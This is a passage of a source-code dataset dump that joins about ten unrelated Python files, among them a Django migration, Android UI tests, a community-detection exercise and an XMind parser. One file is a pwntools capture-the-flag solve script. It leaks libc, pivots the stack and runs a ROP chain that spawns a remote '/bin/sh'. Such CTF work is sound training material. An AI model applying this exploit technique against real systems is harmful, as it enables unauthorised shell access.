06f2d36fbb85bae7a5b684e93a760e88ee7b328d | de392462a549be77e5b3372fbd9ea6d7556f0282 | /accounts/migrations/0198_auto_20210812_1748.py | 26547e06f8a5011da9233e88c29c998430ef3246 | [] | no_license | amutebe/AMMS_General | 2830770b276e995eca97e37f50a7c51f482b2405 | 57b9b85ea2bdd272b44c59f222da8202d3173382 | refs/heads/main | 2023-07-17T02:06:36.862081 | 2021-08-28T19:07:17 | 2021-08-28T19:07:17 | 400,064,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | # Generated by Django 3.2.3 on 2021-08-12 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0197_auto_20210812_1740'),
]
operations = [
migrations.AlterField(
model_name='car',
name='car_number',
field=models.CharField(default='BCL12082021142', max_length=200, primary_key=True, serialize=False, verbose_name='Corrective action no.:'),
),
migrations.AlterField(
model_name='employees',
name='employeeID',
field=models.CharField(default='BCL11', max_length=20, primary_key=True, serialize=False, verbose_name='Employee ID'),
),
]
| [
"mutebe2@gmail.com"
] | mutebe2@gmail.com |
0cc944ad08606f283d0fd21ac183c8c897f213ab | 798fb70caa831fc091afcc68b0584a16201b776b | /pwn/gawr_gura/solve.py | ced45fa0d021d99b987db30f6055598c58f583e7 | [] | no_license | xuunnis123/ncu-ad-2021 | d26176147eacb7134887233eecf3521986dd0d58 | c061801835e4f2aa946e00326fdf65be15378450 | refs/heads/main | 2023-09-02T04:39:32.619649 | 2021-11-17T07:33:08 | 2021-11-17T07:33:08 | 428,971,719 | 3 | 0 | null | 2021-11-17T08:52:10 | 2021-11-17T08:52:09 | null | UTF-8 | Python | false | false | 1,212 | py | #!/usr/bin/python3
# -*- coding: UTF-8 -*-
from pwn import *
context.arch = 'amd64'
# p = process('./distribute/share/gawr_gura')
p = remote('ctf.adl.tw', 10003)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rax = 0x4a550
pop_rdi = 0x26b72
pop_rsi = 0x27529
pop_rdx_pop_r12 = 0x11c371
syscall = 0x2584d
bss = 0x407f00
read_again = 0x4017CC
leave_ret = 0x40185a
p.sendlineafter(b"7.) exit\n", b"5")
p.sendafter(b"What do you want to say?\n", cyclic(0x2c))
p.sendlineafter(b"7.) exit\n", b"6")
p.recvline()
p.recv(0x2c)
libc.address = u64((p.recv(6)).strip().ljust(8, b'\x00')) - \
libc.sym['_IO_2_1_stdout_']
success('libc base: 0x%x', libc.address)
payload = b'a'*80
payload += p64(bss)
payload += p64(read_again)
p.sendafter(b"Write on your suggestion. Thank you.\n", payload)
payload = p64(libc.address+pop_rdi)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(libc.address+pop_rsi)
payload += p64(0)
payload += p64(libc.address+pop_rdx_pop_r12)
payload += p64(0)
payload += p64(0)
payload += p64(libc.address+pop_rax)
payload += p64(0x3b)
payload += p64(libc.address+syscall)
payload += p64(bss-0x58)
payload += p64(leave_ret)
p.sendline(payload)
p.interactive()
p.close()
| [
"opp556687@gmail.com"
] | opp556687@gmail.com |
281090431d5371b25cb5f61faa42b5ded0fee6a8 | b2ba670818623f8ab18162382f7394baed97b7cb | /test-data/AndroidSlicer/Carnote/DD/32.py | 4201f082c91275a5dd9fd6d0c08a4ab34f2b21ff | [
"MIT"
] | permissive | hsumyatwin/ESDroid-artifact | 012c26c40537a79b255da033e7b36d78086b743a | bff082c4daeeed62ceda3d715c07643203a0b44b | refs/heads/main | 2023-04-11T19:17:33.711133 | 2022-09-30T13:40:23 | 2022-09-30T13:40:23 | 303,378,286 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | #start monkey test seedNo 0
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint
device = MonkeyRunner.waitForConnection()
package = 'com.spisoft.quicknote'
activity ='com.spisoft.quicknote.MainActivity'
runComponent = package+'/'+activity
device.startActivity(component=runComponent)
MonkeyRunner.sleep(0.5)
MonkeyRunner.sleep(0.5)
device.touch(982,153, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(699,932, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(923,1695, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(963,1730, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(62,124, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(467,678, 'DOWN_AND_UP')
| [
"hsumyatwin@gmail.com"
] | hsumyatwin@gmail.com |
ff38640ad5a4f55a1f83c27af699d4597b525d3d | 70f41a06d733e680af3bb1f00d8ff33574f4f4bb | /src/fh_tools/language_test/base_test/bisect_demo/grades_demo.py | 3c04e262f62fafdf04b345d787e0ae2cae0fa7b6 | [
"MIT"
] | permissive | mmmaaaggg/RefUtils | 209f7136acc63c880e60974c347e19adc4c7ac2e | f127658e75b5c52b4db105a22176ee0931ceacae | refs/heads/master | 2021-06-11T16:06:06.245275 | 2021-03-10T05:32:14 | 2021-03-10T05:32:14 | 139,413,962 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | #! /usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author : MG
@Time : 19-8-9 上午10:33
@File : grades_demo.py
@contact : mmmaaaggg@163.com
@desc : 通过二分发计算分数等级
"""
import bisect
def grade(score, breakpoints=[60, 70, 80, 90], grades='FDCBA'):
i = bisect.bisect(breakpoints, score)
return grades[i]
print([grade(score) for score in [33, 99, 77, 70, 89, 90, 100]])
if __name__ == "__main__":
pass
| [
"mmmaaaggg@163.com"
] | mmmaaaggg@163.com |
0ae10a2b6e6b55491ec55d65a1c850dc3e3e6053 | 8354ba19cacacdc7162a86b7443453c594e8be86 | /list2/ex6/ex6.py | f87711a65fd80224405c90b3b49eaaf1656fb768 | [] | no_license | fvvsantana/complexNetworks | 459204e540f0497d34f1c796235549959456f33e | e89944c57fc3d6f55b96e8057b134297874ba291 | refs/heads/master | 2022-04-16T01:26:51.501647 | 2020-03-04T19:00:51 | 2020-03-04T19:00:51 | 207,572,665 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,210 | py | #| # Exercise 6
#| Import the libraries that we'll use
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
from networkx.algorithms import community
from networkx.algorithms.community import LFR_benchmark_graph
from community import community_louvain
from networkx.algorithms.community import greedy_modularity_communities
from networkx.algorithms.community import label_propagation_communities
from networkx.algorithms.community import asyn_lpa_communities
from sklearn.metrics import normalized_mutual_info_score
from sklearn.metrics import mutual_info_score
from sklearn.metrics import adjusted_mutual_info_score
import pandas as pd
from IPython.display import display, HTML, display_pretty
import os
np.random.seed(50)
#| ## Benchmark function
# Generate a graph for girvan newman benchmark
def benchmark_girvan_newman():
N = 128
tau1 = 3
tau2 = 1.5
mu = 0.04
k =16
minc = 32
maxc = 32
return LFR_benchmark_graph(n = N, tau1 = tau1, tau2 = tau2, mu = mu, min_degree = k,
max_degree = k, min_community=minc, max_community = maxc, seed = 10)
#| ## Method functions
# Louvain's community detection method
def detect_communities_louvain(G):
partition = community_louvain.best_partition(G)
communities = list()
for com in set(partition.values()) :
list_nodes = [nodes for nodes in partition.keys() if partition[nodes] == com]
communities.append(sorted(list_nodes))
return sorted(communities)
# Girvan Newman's community detection method
def detect_communities_girvan_newman(G):
communities = community.girvan_newman(G)
return sorted(sorted(c) for c in next(communities))
# Fast Greedy community detection method
def detect_communities_greedy(G):
communities = greedy_modularity_communities(G)
return sorted(map(sorted, communities))
# Label propagation community detection method
def detect_communities_label_propagation(G):
communities = list()
#for c in asyn_lpa_communities(G):
for c in label_propagation_communities(G):
communities.append(sorted(c))
return sorted(communities)
#| ## Function to plot communities
# Plot graph with communities, receives a list of communities, where each community is a list of nodes (ints)
def show_communities(G, communities, name='title'):
pos=nx.spring_layout(G)
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w']
plt.figure()
plt.title(name, fontsize=20)
aux = 0
for community in communities:
nx.draw_networkx_nodes(G, pos, community, node_size = 50, node_color = colors[aux])
aux = aux + 1
nx.draw_networkx_edges(G, pos, alpha=0.5)
plt.show(block=True)
#| This function will help us to turn the partitions generated by the methods into
#| classification lists as explained
# Turn a list of communities, where each community is a list of nodes, into a classification.
# Classification is a list of classes, where the value v in the position i means that the node
# i belongs to the community v.
def communitiesToClassification(communities):
# Get number of nodes
nNodes = len(G)
# Initialize a list of size nNodes
classification = [0]*nNodes
# Go through the list filling it with the classes
for i in range(len(communities)):
for j in communities[i]:
classification[j] = i
# Return classification
return classification
#| Now that we did almost everything we'll need, let's call our functions
if __name__ == "__main__":
# Create the graph for benchmark
G = benchmark_girvan_newman()
# Get the true set of communities
communities = {frozenset(G.nodes[v]['community']) for v in G}
communities = sorted(map(sorted, communities))
# Turn partition into classification
realClassification = communitiesToClassification(communities)
# List of method names
methodNames = [
'Louvain',
'Girvan Newman',
'Fast Greedy',
'Label Propagation'
]
# List of community detection methods
methods = [
detect_communities_louvain,
detect_communities_girvan_newman,
detect_communities_greedy,
detect_communities_label_propagation
]
# Dict where we'll put the results
data = {'Method': methodNames, 'Normalized Mutual Information':[]}
# For each method in the list
for i in range(len(methods)):
# Apply community detection method on graph
result = methods[i](G)
# Plot graph with its communities and name it
#show_communities(G, result, name=methodNames[i])
# Turn communities into a classification list
classification = communitiesToClassification(result)
# Calculate Normalized Mutual Information
nmi = normalized_mutual_info_score(realClassification, classification, average_method='arithmetic')
# Append NMI
data['Normalized Mutual Information'].append(nmi)
# Display DataFrame
df = pd.DataFrame(data)
display(df)
#| As we can see, the girvan newman method was the worse on accuracy and also on time of execution. The other methods did a good job on classifying the communities, with 100% accuracy.
| [
"fvvsantana@gmail.com"
] | fvvsantana@gmail.com |
c8e5b610e66fe12f06e9864a4d4e8f7b71e3ef09 | d72b976375e3dfb036d517ccb1a964dc6cb2d304 | /xmind2testcase/parser.py | ee32a7fabf7269d69b6d5fbbbc252f6a8ef24f50 | [
"MIT"
] | permissive | kingfeng999/format-conversion | 6cee87ae9401809222e776ffbfef77e7bf9a1c54 | 9260b4b44e7a6d81435478b61a87e2eba171199a | refs/heads/master | 2023-07-12T18:07:13.983277 | 2021-09-02T06:26:45 | 2021-09-02T06:26:45 | 402,277,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,738 | py | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
import logging
from xmind2testcase.metadata import TestSuite, TestCase, TestStep
config = {'sep': ' ',
'valid_sep': '&>+/-',
'precondition_sep': '\n----\n',
'summary_sep': '\n----\n',
#用例类型的配置
'type_sep': '\n----\n',
'ignore_char': '#!!'
}
def xmind_to_testsuites(xmind_content_dict):
"""convert xmind file to `xmind2testcase.metadata.TestSuite` list"""
suites = []
for sheet in xmind_content_dict:
logging.debug('start to parse a sheet: %s', sheet['title'])
root_topic = sheet['topic']
sub_topics = root_topic.get('topics', [])
if sub_topics:
root_topic['topics'] = filter_empty_or_ignore_topic(sub_topics)
else:
logging.warning('This is a blank sheet(%s), should have at least 1 sub topic(test suite)', sheet['title'])
continue
suite = sheet_to_suite(root_topic)
# suite.sheet_name = sheet['title'] # root testsuite has a sheet_name attribute
logging.debug('sheet(%s) parsing complete: %s', sheet['title'], suite.to_dict())
suites.append(suite)
return suites
def filter_empty_or_ignore_topic(topics):
"""filter blank or start with config.ignore_char topic"""
result = [topic for topic in topics if not(
topic['title'] is None or
topic['title'].strip() == '' or
topic['title'][0] in config['ignore_char'])]
for topic in result:
sub_topics = topic.get('topics', [])
topic['topics'] = filter_empty_or_ignore_topic(sub_topics)
return result
def filter_empty_or_ignore_element(values):
"""Filter all empty or ignore XMind elements, especially notes、comments、labels element"""
result = []
for value in values:
if isinstance(value, str) and not value.strip() == '' and not value[0] in config['ignore_char']:
result.append(value.strip())
return result
def sheet_to_suite(root_topic):
"""convert a xmind sheet to a `TestSuite` instance"""
suite = TestSuite()
root_title = root_topic['title']
separator = root_title[-1]
if separator in config['valid_sep']:
logging.debug('find a valid separator for connecting testcase title: %s', separator)
config['sep'] = separator # set the separator for the testcase's title
root_title = root_title[:-1]
else:
config['sep'] = ' '
suite.name = root_title
suite.details = root_topic['note']
suite.sub_suites = []
for suite_dict in root_topic['topics']:
suite.sub_suites.append(parse_testsuite(suite_dict))
return suite
def parse_testsuite(suite_dict):
testsuite = TestSuite()
testsuite.name = suite_dict['title']
testsuite.details = suite_dict['note']
testsuite.testcase_list = []
logging.debug('start to parse a testsuite: %s', testsuite.name)
for cases_dict in suite_dict.get('topics', []):
for case in recurse_parse_testcase(cases_dict):
testsuite.testcase_list.append(case)
logging.debug('testsuite(%s) parsing complete: %s', testsuite.name, testsuite.to_dict())
return testsuite
def recurse_parse_testcase(case_dict, parent=None):
if is_testcase_topic(case_dict):
case = parse_a_testcase(case_dict, parent)
yield case
else:
if not parent:
parent = []
parent.append(case_dict)
for child_dict in case_dict.get('topics', []):
for case in recurse_parse_testcase(child_dict, parent):
yield case
parent.pop()
def is_testcase_topic(case_dict):
"""A topic with a priority marker, or no subtopic, indicates that it is a testcase"""
priority = get_priority(case_dict)
if priority:
return True
children = case_dict.get('topics', [])
if children:
return False
return True
def parse_a_testcase(case_dict, parent):
testcase = TestCase()
topics = parent + [case_dict] if parent else [case_dict]
testcase.name = gen_testcase_title(topics)
preconditions = gen_testcase_preconditions(topics)
testcase.preconditions = preconditions if preconditions else '无'
summary = gen_testcase_summary(topics)
#testcase.summary = summary if summary else testcase.name
#设置批注默认值为'无'
testcase.summary = summary if summary else "无"
testcase.execution_type = get_execution_type(topics)
testcase.importance = get_priority(case_dict) or 2
#用例类型赋值,默认为'无'
execution_type = gen_testcase_type(topics)
testcase.execution_type = execution_type if execution_type else '无'
step_dict_list = case_dict.get('topics', [])
if step_dict_list:
testcase.steps = parse_test_steps(step_dict_list)
# the result of the testcase take precedence over the result of the teststep
testcase.result = get_test_result(case_dict['markers'])
if testcase.result == 0 and testcase.steps:
for step in testcase.steps:
if step.result == 2:
testcase.result = 2
break
if step.result == 3:
testcase.result = 3
break
testcase.result = step.result # there is no need to judge where test step are ignored
logging.debug('finds a testcase: %s', testcase.to_dict())
return testcase
def get_execution_type(topics):
labels = [topic.get('label', '') for topic in topics]
labels = filter_empty_or_ignore_element(labels)
exe_type = 1
for item in labels[::-1]:
if item.lower() in ['自动', 'auto', 'automate', 'automation']:
exe_type = 2
break
if item.lower() in ['手动', '手工', 'manual']:
exe_type = 1
break
return exe_type
def get_priority(case_dict):
"""Get the topic's priority(equivalent to the importance of the testcase)"""
if isinstance(case_dict['markers'], list):
for marker in case_dict['markers']:
if marker.startswith('priority'):
return int(marker[-1])
def gen_testcase_title(topics):
"""Link all topic's title as testcase title"""
titles = [topic['title'] for topic in topics]
titles = filter_empty_or_ignore_element(titles)
# when separator is not blank, will add space around separator, e.g. '/' will be changed to ' / '
separator = config['sep']
if separator != ' ':
separator = ' {} '.format(separator)
return separator.join(titles)
def gen_testcase_preconditions(topics):
notes = [topic['note'] for topic in topics]
notes = filter_empty_or_ignore_element(notes)
return config['precondition_sep'].join(notes)
def gen_testcase_summary(topics):
comments = [topic['comment'] for topic in topics]
comments = filter_empty_or_ignore_element(comments)
return config['summary_sep'].join(comments)
def parse_test_steps(step_dict_list):
steps = []
for step_num, step_dict in enumerate(step_dict_list, 1):
test_step = parse_a_test_step(step_dict)
test_step.step_number = step_num
steps.append(test_step)
return steps
def parse_a_test_step(step_dict):
test_step = TestStep()
test_step.actions = step_dict['title']
expected_topics = step_dict.get('topics', [])
if expected_topics: # have expected result
expected_topic = expected_topics[0]
test_step.expectedresults = expected_topic['title'] # one test step action, one test expected result
markers = expected_topic['markers']
test_step.result = get_test_result(markers)
else: # only have test step
markers = step_dict['markers']
test_step.result = get_test_result(markers)
logging.debug('finds a teststep: %s', test_step.to_dict())
return test_step
def get_test_result(markers):
"""test result: non-execution:0, pass:1, failed:2, blocked:3, skipped:4"""
if isinstance(markers, list):
if 'symbol-right' in markers or 'c_simbol-right' in markers:
result = 1
elif 'symbol-wrong' in markers or 'c_simbol-wrong' in markers:
result = 2
elif 'symbol-pause' in markers or 'c_simbol-pause' in markers:
result = 3
elif 'symbol-minus' in markers or 'c_simbol-minus' in markers:
result = 4
else:
result = 0
else:
result = 0
return result
#从xmind的内容中获取用例类型的值
def gen_testcase_type(topics):
labels = [topic['label'] for topic in topics]
labels = filter_empty_or_ignore_element(labels)
return config['type_sep'].join(labels)
| [
"80831093@qq.com"
] | 80831093@qq.com |
d1a70f73fb20ba0b4e77e345f0f3dd1bc1b3ff95 | f29f9ab89a1379ddbe72bc44d51e1f0ac11a1a01 | /tests.py | 0b3a86839711ed9b612dd12edaeec95d890b5959 | [] | no_license | JonnyPtn/foxholewar | b8813f232f6c66d97b2177db1cd3e684a3b876e8 | 6709c427129b55435cf7f002db50e3622f0d51c5 | refs/heads/master | 2023-03-03T10:30:57.369853 | 2021-02-10T22:19:13 | 2021-02-10T22:19:13 | 336,001,357 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,569 | py | import foxholewar
import unittest
class TestFoxholeWar(unittest.TestCase):
def setUp(self):
self.client = foxholewar.Client()
def testWarInfo(self):
war = self.client.fetchCurrentWar()
self.assertTrue(war.warId)
self.assertTrue(war.warNumber)
self.assertTrue(war.winner)
self.assertTrue(war.conquestStartTime)
self.assertTrue(war.conquestEndTime or foxholewar.Team[war.winner] is foxholewar.Team.NONE)
self.assertTrue(war.resistanceStartTime or not war.conquestEndTime)
self.assertTrue(war.requiredVictoryTowns)
def testMapList(self):
mapList = self.client.fetchMapList()
self.assertTrue(mapList)
for map in mapList:
self.assertTrue(map.rawName)
self.assertTrue(map.prettyName)
self.assertTrue(map.scorchedVictoryTowns is not None)
self.assertTrue(map.regionId)
for item in map.mapTextItems:
self.assertTrue(item.text)
self.assertTrue(item.x)
self.assertTrue(item.y)
self.assertTrue(item.mapMarkerType)
for item in map.mapItems:
self.assertTrue(item.teamId)
self.assertTrue(item.iconType)
self.assertTrue(item.x)
self.assertTrue(item.y)
self.assertTrue(item.flags is not None)
report = self.client.fetchReport(map)
self.assertTrue(report is not None)
if __name__ == '__main__':
unittest.main() | [
"jonathan.r.paton@googlemail.com"
] | jonathan.r.paton@googlemail.com |
f9abec6fa42e9d878564cd66daad29f560d5db88 | ef94abd0f60fae659d0a88c943bc674071ac09bb | /CV/016_Blur.py | a89599fb7396045c97c9c4b8c47c7bf4069cd577 | [] | no_license | ookeyLai/demo_rep | 544b8620f4540d6c0ddc7d6bb924bf03998bde6d | e6be1faf337aaa7f2bd7f1937cbca1f1164b13d6 | refs/heads/master | 2020-07-01T12:56:04.943928 | 2019-08-08T05:06:16 | 2019-08-08T05:06:16 | 201,182,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Jan 18 14:59:58 2018
@author: 103009
"""
import numpy as np
import cv2
pic = cv2.imread('data/test.jpg')
matrix = (7,7)
blur = cv2.GaussianBlur(pic,matrix,0)
cv2.imshow('Blur',blur)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"ookey.lai@gmail.com"
] | ookey.lai@gmail.com |
cb6accfd6065f9b2156c864d8fcd85c969a8dc89 | e53e6231dfdc768fe5c8120ff6f2d85532bd6127 | /wrappers/python/tests/test_document.py | d77c548f53cca5175e08d3f0bcbd8f4d9da8a945 | [] | no_license | shiwenxiang/clucene | 151a2aa77a721533b04789e2aa2053bea1b32494 | d9da18a8dc90be43c8da370590e528749502f3c8 | refs/heads/master | 2016-09-06T07:17:09.129196 | 2005-05-13T15:06:26 | 2009-12-10T08:54:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,612 | py | import datetime, os.path, sets, shutil, sys, time, unittest
from cStringIO import StringIO
import test_base
from pyclene import lucene
_THIS_FILENAME = test_base.getFilenameOfThisPythonTestModule(__file__)
def getFullTestSuite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite(FieldTest) )
suite.addTest( unittest.makeSuite(DateFieldTest) )
suite.addTest( unittest.makeSuite(DocumentTest) )
return suite
class FieldTest(test_base.CommonBaseTest):
def testConstructor_AND_properties(self):
# Field(String name, String string, boolean store, boolean index, boolean token)
# Construct from string:
f = lucene.Field('theName', 'theValue', True, True, True)
self.assertEqual(f.name, 'theName')
self.assertEqual(f.value, 'theValue')
self.assertEqual(f.isStored, True)
self.assertEqual(f.isIndexed, True)
self.assertEqual(f.isTokenized, True)
# Construct from lucene.Reader instance:
#_ABANDONED_:
# PythonFileReader was eliminated because it was 90x slower than the
# C++ FileReader (under a non-unicode build, at least).
#pyFile = file(_THIS_FILENAME, 'rb')
#rIn = lucene.PythonFileReader(pyFile)
rIn = lucene.FileReader(_THIS_FILENAME)
f = lucene.Field('theName', rIn, True, True, True)
self.assertEqual(f.name, 'theName')
self.assertEqual(f.value, rIn)
# _ABANDONED_:PythonFileReader eliminated:
#self.assertEqual(f.reader.read(), file(pyFile.name, 'rb').read())
self.assertEqual(f.isStored, True)
self.assertEqual(f.isIndexed, True)
self.assertEqual(f.isTokenized, True)
# Verify the immutability of the following properies:
self.assertRaises(AttributeError, setattr, f, 'name', 'other')
self.assertRaises(AttributeError, setattr, f, 'value', 'other')
self.assertRaises(AttributeError, setattr, f, 'isStored', False)
self.assertRaises(AttributeError, setattr, f, 'isIndexed', False)
self.assertRaises(AttributeError, setattr, f, 'isTokenized', False)
def test_staticFactories(self):
fields = FieldTest._createFromStaticFactories()
for f in fields[:-1]:
self.assertEqual(f.name, 'mime-type')
self.assertEqual(f.value, 'text/plain')
f = fields[-1] # Reader-based rather than materialized-string-based.
self.assertEqual(f.name, 'mime-type')
self.assertNotEqual(f.value, None)
def _createFromStaticFactories():
fields = []
for factoryName in (
'Keyword', 'Unindexed', 'Text', 'Unstored'
):
f = getattr(lucene.Field, factoryName)('mime-type', 'text/plain')
fields.append(f)
# The variant of lucene.Field.Text that takes a Reader value rather
# than a string value.
# _ABANDONED_:PythonFileReader eliminated:
# pyFile = file(_THIS_FILENAME, 'rb')
# rIn = lucene.PythonFileReader(pyFile)
rIn = lucene.FileReader(_THIS_FILENAME)
f = lucene.Field.Text('mime-type', rIn)
fields.append(f)
return fields
_createFromStaticFactories = staticmethod(_createFromStaticFactories)
def test___str__(self):
# CLucene 0.8.9 overflowed a buffer if Field::toString was called on
# a field with a large value. Exercise the Field::toString method
# (aliased as __str__ in the Python wrapper) to ensure that it behaves
# reponsibly.
f = lucene.Field('theName', 'theValue' * 500000, True, True, True)
str(f); repr(f)
f = lucene.Field('theName', '', True, True, True)
str(f); repr(f)
f = lucene.Field('', '', True, True, True)
str(f); repr(f)
class DateFieldTest(test_base.CommonBaseTest):
def test_staticMembers(self):
self.assert_(lucene.DateField.MAX_DATE_STRING >= lucene.DateField.MIN_DATE_STRING)
# timeToString should accept both ticks and datetime.datetime
# instances.
ticks = int(time.time())
stringFromTicks = lucene.DateField.timeToString(ticks)
ticksDateTime = datetime.datetime.fromtimestamp(ticks)
stringFromDateTime = lucene.DateField.timeToString(ticksDateTime)
self.assertEqual(stringFromTicks, stringFromDateTime)
# stringToTicks (returns integer ticks):
self.assertEqual(
lucene.DateField.stringToTicks(stringFromTicks), ticks
)
# stringToTime (returns datetime.datetime object):
self.assertEqual(
lucene.DateField.stringToTime(stringFromTicks), ticksDateTime
)
class DocumentTest(test_base.CommonBaseTest):
def testConstructor(self):
d = lucene.Document()
return d
def test_fieldMembershipAndRetrieval(self):
# This case tests numerous Document methods, including the pyclene
# equivalents of CLucene's Document::add, ::getField, and ::fields.
def requireFieldSet(doc, reqFields):
reqFields = sets.ImmutableSet(reqFields) # Order is undefined
# Materialized:
self.failIf(reqFields - sets.ImmutableSet(doc.fields()))
# Iterated:
self.failIf(reqFields - sets.ImmutableSet([field for field in doc]))
d = self.testConstructor()
requireFieldSet(d, [])
# Make sure trying to add None raises a TypeError.
self.assertRaises(TypeError, d.add, None)
f1 = lucene.Field.Keyword('blah1', 'value200')
d.add(f1)
requireFieldSet(d, [f1])
# Unlike CLucene's Document, pyclene's does not accept multiple fields
# with the same name.
f1_5 = lucene.Field.Keyword('blah1', 'value')
self.assertRaises(KeyError, d.add, f1_5)
f2 = lucene.Field.Keyword('blah2', 'value100')
d.add(f2)
requireFieldSet(d, [f1, f2])
# _ABANDONED_:PythonFileReader eliminated:
#pyFile = file(_THIS_FILENAME, 'rb')
#rIn = lucene.PythonFileReader(pyFile)
rIn = lucene.FileReader(_THIS_FILENAME)
f3 = lucene.Field.Text('other', rIn)
d.add(f3)
requireFieldSet(d, [f1, f2, f3])
f4 = lucene.Field.Keyword('blah3', 'value300')
d.add(f4)
requireFieldSet(d, [f1, f2, f3, f4])
f5 = lucene.Field.Keyword('aardvark', 'value500')
d.add(f5)
requireFieldSet(d, [f1, f2, f3, f4, f5])
self.assertEqual(d['aardvark'], 'value500')
self.assertEqual(d['blah1'], 'value200')
self.assertEqual(d['blah2'], 'value100')
self.assertEqual(d['blah3'], 'value300')
self.assertEqual(d['other'], rIn)
self.assertEqual(
sets.ImmutableSet([f for f in d.fields()]),
sets.ImmutableSet([f1,f2,f3,f4,f5])
)
# A Document is immutable; a field cannot be removed once it's added.
# Ensure that a Document does not support item deletion.
try:
del d['aardvark']
except TypeError:
pass
else:
self.fail('Attempt to del item from Document should not have succeeded.')
def test___str__(self):
# Exercise CLucene's Document::toString method.
d = self.testConstructor()
f = lucene.Field('theName', 'theValue' * 500000, True, True, True)
d.add(f)
str(d); repr(d)
for f in FieldTest._createFromStaticFactories():
str(d); repr(d)
if __name__ == '__main__':
import test
test.main(suite=getFullTestSuite())
| [
"schwern@pobox.com"
] | schwern@pobox.com |
f1f4168c3797c481d71296c7d960e54ea668b568 | 46e9153700e42cdf7a90fc82952d6cffbebc7a63 | /badminton.py | 6c466862601c2ccf4c983014699fe65f98d038d7 | [] | no_license | peepliuct/badminton | 1556d440cb99a2f03d06c5f51f8a80f9f1eee57e | 5dad29853371750113fdbae2de358319f3465163 | refs/heads/master | 2020-06-04T02:59:15.065395 | 2013-09-14T14:53:56 | 2013-09-14T14:53:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | import os
import urllib
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'])
class MainPage(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('hello2.html')
self.response.write(template.render())
class EventOp(webapp2.RequestHandler):
def create(eventObj):
app = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
| [
"changtai@changtai.liu"
] | changtai@changtai.liu |
75b3c4d5e2dd62fac21f0f7d3f5fee00bfbff732 | f90f218c3f8124b84141ed059a81b01d35889bc5 | /app_2gis/views.py | c3c1da7f6076610ae977fc45d9e14cad5fed73fd | [] | no_license | rodakalex/mapApi | 1c62141e7beb098a9e6c2bd11d0b6749d066d912 | adbbee4adb0668ce605128d917c1f78411d956fa | refs/heads/master | 2023-02-19T04:30:33.802873 | 2021-01-19T21:04:15 | 2021-01-19T21:04:15 | 330,678,566 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | from rest_framework.response import Response
from rest_framework.views import APIView
from django.shortcuts import render
from .models import Path
def index(request):
return render(request, "index.html", context={})
class Coord(APIView):
def get(self, request):
coords = Path.objects.all()
return Response({"coords": coords})
| [
"ravengothic@mail.ru"
] | ravengothic@mail.ru |
2155f6826ed7b9607bfc77f9e46bc7b6daf29ed5 | 95d64b1dea3db73e85562aa2665c3a696370a679 | /code/information-gain.py | da46714604a93ed9d59f09d41c3b92d03c5e7812 | [] | no_license | Smolky/exist-2021 | 7481e36fb3f44263c1a2190890fc6ac894c4fac5 | 2d51a01a829cb9e9b44eca5b9eefb06cb62162c8 | refs/heads/main | 2023-05-30T14:21:56.913663 | 2021-06-16T08:10:36 | 2021-06-16T08:10:36 | 364,022,851 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,758 | py | """
Information Gain per class
This class calculates the Information Gain (Mutual Info) of a dataset
and uses it to select the most discrimatory features
@author José Antonio García-Díaz <joseantonio.garcia8@um.es>
@author Rafael Valencia-Garcia <valencia@um.es>
"""
import os
import sys
import argparse
import pandas as pd
import numpy as np
import pickle
from pathlib import Path
from sklearn import preprocessing
from sklearn.feature_selection import mutual_info_classif
from sklearn.feature_selection import mutual_info_regression
from dlsdatasets.DatasetResolver import DatasetResolver
from utils.Parser import DefaultParser
from features.FeatureResolver import FeatureResolver
from sklearn.pipeline import Pipeline, FeatureUnion
from features.TokenizerTransformer import TokenizerTransformer
def main ():
# var parser
parser = DefaultParser (description = 'Calculates the Information Gain (Mutual Info) per class and obtains the best LF')
# @var args Get arguments
args = parser.parse_args ()
# @var dataset_resolver DatasetResolver
dataset_resolver = DatasetResolver ()
# @var dataset Dataset This is the custom dataset for evaluation purposes
dataset = dataset_resolver.get (args.dataset, args.corpus, args.task, False)
dataset.filename = dataset.get_working_dir (args.task, 'dataset.csv')
# @var df Ensure if we already had the data processed
df = dataset.get ()
# @var task_type String
task_type = dataset.get_task_type ()
# @var df_train DataFrame
df_train = dataset.get_split (df, 'train')
df_train = df_train[df_train['label'].notna()]
# @var feature_resolver FeatureResolver
